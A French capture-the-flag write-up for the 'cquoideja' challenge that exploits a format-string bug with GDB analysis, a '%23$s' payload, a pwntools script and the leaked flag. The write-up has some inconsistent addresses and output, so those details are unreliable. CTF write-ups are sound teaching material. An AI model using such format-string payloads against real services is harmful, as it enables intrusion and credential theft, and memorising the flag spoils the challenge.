# Write up Pown/cquoideja

## Consignes : 

```
Un administrateur a perdu le mot de passe lui permettant de se connecter au serveur <adresse ip du serveur>:31001. 
Il a le code source et le binaire, mais le mot de passe est
`        TODO... `
Retrouvez son vrai mot de passe. Et pas besoin de bruteforce !
        
```

## Pièce jointe :

```
cquoideja.c
cquoideja
```

## Serveur :

```
Docker
```

## Points attribués :

```
30
```

## Hint : 

```

```

## Flag :

```
fl@g{Br@v0,-TU_4s-0bt3nu_l3-fLAg_!}
```

## Créateur :

```
ESD
```

## Soluce :

Le but de ce challenge est d'exploiter une *format string*.

Pour commencer, nous avons le code source. Après son analyse, on peut voir qu'un printf est effectué sans formatage :

```c
if (response[0] == 'Y') {
printf("Tu pensais vraiment être admin.. :D\n");
fflush(stdout);
exit(-2);
} else {
printf("Tu as choisi '");
printf(response);                             <======= ICI
printf("', c'était le bon choix.\n");
fflush(stdout);
}
```

Sachant que l'on contrôle ce qui est passé dans *response*, nous pouvons lui passer un *format* afin de retrouver une chaîne que nous passons ("AAAA" par exemple).

Pour ce faire, nous allons compiler le programme et le débugger avec GDB (extension pwndbg). 

On ouvre le programme avec `gdb`, on affiche la fonction authentification et on place un point d'arret à authentification+211 

```
gdb ./cquoideja
start
break *authentification+211
continue

```

On se retrouve avec ça :

​    Le programme s'est arrété sur le breakpoint  en authentification+211 (0x8049430)

```asm
   0x8049421 <authentification+196>    call   printf@plt                     <printf@plt>
 
   0x8049426 <authentification+201>    add    esp, 0x10
   0x8049429 <authentification+204>    sub    esp, 0xc
   0x804942c <authentification+207>    lea    eax, [ebp - 0x4c]
   0x804942f <authentification+210>    push   eax
 ► 0x8049430 <authentification+211>    call   printf@plt                     <printf@plt>    (breakpoint)
        format: 0xffffceec ◂— 'AAAABBBBCCCCDDDD'
        vararg: 0x40
 
   0x8049435 <authentification+216>    add    esp, 0x10
   0x8049438 <authentification+219>    sub    esp, 0xc
   0x804943b <authentification+222>    lea    eax, [ebx - 0x1fa8]
   0x8049441 <authentification+228>    push   eax
   0x8049442 <authentification+229>    call   puts@plt                     <puts@plt>
────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────
00:0000│ esp 0xffffce90 —▸ 0xffffceec ◂— 'AAAABBBBCCCCDDDD'
01:0004│     0xffffce94 ◂— 0x40 /* '@' */
02:0008│     0xffffce98 —▸ 0xf7fb0580 (_IO_2_1_stdin_) ◂— 0xfbad2288
03:000c│     0xffffce9c —▸ 0x8049370 (authentification+19) ◂— add    ebx, 0x2c90
04:0010│     0xffffcea0 ◂— 0x0
05:0014│     0xffffcea4 ◂— 0x0
06:0018│     0xffffcea8 ◂— 0x1fff
07:001c│     0xffffceac —▸ 0xf7fb0000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c

```

On voit que la chaîne est stockée à **0xffffceec**. 

Pour calculer à combien se trouve cet argument (dans la stack), on fait **(0xffffce90-esp-4)/4** 

(ou  **(0xffffceec-0xffffce90)/4** dans GDB) qui donne 23 en décimal.

Maintenant qu'on a cette information, on n'a plus qu'à trouver le pointeur sur *TODO*, et le mettre a la place des *AAAA*. 

Pour ça, on exécute la commande search *TODO...* dans GDB.

```
search TODO...
cquoideja       0x804c060 'TODO...'    <===  adresse de la chaine "TODO...""

```

On a donc tout pour écrire notre payload: @TODO%23$s, soit 0x0804a060%23$s (ne pas oublier que c'est du LittleEndian, donc reverse la chaine). 

Voici un exemple d'exploit en python3 permettant de résoudre ce challenge.

```python
#!/usr/bin/env python3
#coding: utf-8
from pwn import *
decodeByte = lambda str: bytes.decode(str, encoding='utf-8')
#hote = "127.0.0.1"
#port = 8954
#r = remote(hote, port)
r = process("./cquoideja") 
elf = ELF('./cquoideja')
#Obtention de l'adresse de validPassword
addr_base=p32(elf.symbols['validPassword'])            
#Envoi du payload
r.readuntil("[Y/N]: ")
r.sendline(addr_base+b"%23$s")
#Récupération du mot de passe
res = r.readuntil("passe: ")
password = decodeByte(res.split(b"'")[1][len(addr_base):])
log.success("PWNED ! Le mot de passe est: %s" % (password))
r.sendline(password)
log.success(decodeByte(r.read(200)))
```

Résultat:

```
[+] Opening connection to 192.168.0.42 on port 31001: Done
[+] PWNED ! Le mot de passe est: b'fl@g{Br@v0,-TU_4s-0bt3nu_l3-fLAg_!}'
[+] Connecté ! Valide le challenge avec ce mot de passe :)
[*] Closed connection to 192.168.0.42 port 31001
```

<!-- Ok F : 20220423 -->
